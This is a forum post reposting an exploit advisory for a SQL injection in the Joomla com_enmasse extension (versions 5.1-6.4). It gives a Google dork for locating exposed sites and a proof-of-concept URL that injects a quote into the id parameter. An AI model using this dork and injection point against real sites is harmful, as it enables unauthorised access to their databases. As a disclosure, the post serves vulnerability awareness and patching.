Jump to content
hades

[JOOMLA] com_enmasse - SQL Injection

Recommended Posts

Posted

# Exploit Title: Joomla com_enmasse  - SQL Injection
 
# Author: [ Hamed Izadi ]

                                                #IRAN

# Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse
# Category: [ Webapps ]
# Tested on: [ Win ]
# Versions: 5.1-6.4
# Date: 2016/06/15
# Google Dork: inurl:component/enmasse/


# PoC:
# id Parameter Vulnerable To SQL
 
# Demo:
# http://example.com/component/enmasse/term?tmpl=component&id=2%27


# Youtube: https://youtu.be/LB5qVnXhzXE

#  L u Arg

via

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...